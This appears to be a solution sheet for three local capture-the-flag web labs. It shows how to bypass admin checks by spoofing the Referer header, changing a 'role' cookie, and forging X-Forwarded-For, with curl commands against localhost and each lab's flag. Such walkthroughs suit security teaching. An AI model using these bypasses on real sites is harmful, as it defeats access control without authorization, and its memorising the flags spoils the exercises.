Lab 1 - Referer-based Access Control:
  Add HTTP header: Referer: http://admin-portal.internal/
  The server checks if Referer contains "admin-portal" — no real auth.
  curl -H "Referer: http://admin-portal.internal/" http://localhost/AdminBypass/lab1.php
  Flag: flag{admin_bypass_referer_spoof}

Lab 2 - Cookie Role Manipulation:
  Look for the "role" cookie in DevTools → Application → Cookies.
  Change the value from "guest" to "admin" and reload.
  Flag: flag{admin_bypass_cookie_role_tamper}

Lab 3 - IP Whitelist Bypass:
  The server trusts X-Forwarded-For without validation.
  Add: X-Forwarded-For: 127.0.0.1
  curl -H "X-Forwarded-For: 127.0.0.1" http://localhost/AdminBypass/lab3.php
  Flag: flag{admin_bypass_ip_whitelist_xff}